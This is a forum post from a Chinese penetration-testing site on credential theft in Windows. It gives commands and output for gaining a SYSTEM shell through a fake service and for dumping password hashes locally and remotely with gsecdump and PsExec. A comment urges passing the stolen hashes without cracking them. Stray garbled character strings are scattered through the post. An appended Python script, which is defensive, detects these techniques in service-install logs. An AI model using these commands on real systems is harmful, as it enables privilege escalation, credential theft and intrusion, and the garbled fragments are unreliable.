China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: Hash injection attack

Author: admin    Time: 2012-11-6 21:09
Title: Hash injection attack
To get a DOS Prompt as NT system:

C:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
[SC] CreateService SUCCESS

C:\>sc start shellcmdline
[SC] StartService FAILED 1053:

The service did not respond to the start or control request in a timely fashion.

C:\>sc delete shellcmdline
[SC] DeleteService SUCCESS

------------

Then in the new DOS window:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>whoami
NT AUTHORITY\SYSTEM

C:\WINDOWS\system32>gsecdump -h
gsecdump v0.6 by Johannes Gumbel (johannes.gumbel@truesec.se)
usage: gsecdump [options]

options:
-h [ --help ] show help
-a [ --dump_all ] dump all secrets
-l [ --dump_lsa ] dump lsa secrets
-w [ --dump_wireless ] dump microsoft wireless connections
-u [ --dump_usedhashes ] dump hashes from active logon sessions
-s [ --dump_hashes ] dump hashes from SAM/AD

Although I like to use:

PsExec v1.83 - Execute processes remotely
Copyright (C) 2001-2007 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT

to get the hashes from active logon sessions of a remote system.

These are a lot better than getting a cachedump of the Cached Credentials because these hashes are LM hashes that can be easily broken with Rainbow Tables.

" e  a$ w( n9 E: \+ y) s( N" W) @提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.
8 s( j! X5 C4 Q1 K  }: H' B3 D$ k原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
( g9 d4 R5 o7 ]- ?& R  s* J+ h8 Y) m1 C5 o$ F6 u9 }) }
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
9 T0 c& h3 w1 x5 c; X7 H/ \$ X9 A
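Added example, not from this post or from the truesec original: both techniques in the thread leave a service-installation record on the host. The local SYSTEM shell is a service whose "binary" is cmd.exe (and its start fails with error 1053 right afterwards), and PsExec with -s -c installs its own PSEXESVC service on the remote machine. The script below parses constructed records laid out like the message body of System log event 7045 ("A service was installed in the system") and flags both patterns. The sample records, the service name shellcmdline and the rule names are all made up for this example.

```python
from __future__ import annotations
import re

# Constructed sample records in the layout of the Windows System log event 7045
# message body. Made up for this example; not real logs from any host.
SAMPLE_EVENTS = [
    """Event ID: 7045
Service Name:  shellcmdline
Service File Name:  C:\\WINDOWS\\system32\\cmd.exe /K start
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem""",
    """Event ID: 7045
Service Name:  PSEXESVC
Service File Name:  %SystemRoot%\\PSEXESVC.exe
Service Type:  user mode service
Service Start Type:  demand start
Service Account:  LocalSystem""",
    """Event ID: 7045
Service Name:  Spooler2
Service File Name:  C:\\WINDOWS\\system32\\spoolsv.exe
Service Type:  user mode service
Service Start Type:  auto start
Service Account:  LocalSystem""",
]

# A legitimate service does not run through a command interpreter; a service
# image that is one of these is the "sc create ... cmd.exe /K start" trick.
SHELL_BINARIES = ("cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe")

# "Key:  value" lines; the first colon followed by whitespace ends the key, so
# drive letters in the value ("C:\...") are left alone.
FIELD_RE = re.compile(r"^(?P<key>[A-Za-z ]+?):\s+(?P<value>.*)$", re.M)


def parse_7045(text: str) -> dict[str, str]:
    """Turn a 7045-style message body into a dict of its fields."""
    return {m.group("key").strip(): m.group("value").strip()
            for m in FIELD_RE.finditer(text)}


def classify(event: dict[str, str]) -> list[str]:
    """Return the reasons a service-install record matches the techniques above."""
    reasons: list[str] = []
    if event.get("Event ID") != "7045":
        return reasons
    name = event.get("Service Name", "")
    file_name = event.get("Service File Name", "")
    # First token of the command line is the image; compare case-insensitively.
    image = file_name.lower().split()[0] if file_name else ""
    account = event.get("Service Account", "")

    if any(image.endswith(b) for b in SHELL_BINARIES):
        reasons.append(f"service image is a command interpreter ({file_name}) "
                       f"running as {account}; expect a StartService 1053 error next")
    if name.upper() == "PSEXESVC" or image.endswith("psexesvc.exe"):
        reasons.append(f"PsExec service installed ({name}); remote execution as {account}")
    return reasons


def scan(events: list[str]) -> list[tuple[str, list[str]]]:
    """Run the rules over every record; return (service name, reasons) for hits only."""
    hits = []
    for raw in events:
        ev = parse_7045(raw)
        reasons = classify(ev)
        if reasons:
            hits.append((ev.get("Service Name", "?"), reasons))
    return hits


if __name__ == "__main__":
    for service, why in scan(SAMPLE_EVENTS):
        print(service, "->", "; ".join(why))
```

The third record (a normal spooler-style service) produces no hit, so the rules do not fire on every LocalSystem service, only on an interpreter image or the PsExec service name. On a real estate the same two rules can be run over Security event 4697 as well, and the shell-service rule pairs naturally with the 7000/7009 start-failure events that follow it.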




Welcome to China Network Penetration Testing Alliance (https://cobjon.com/) Powered by Discuz! X3.2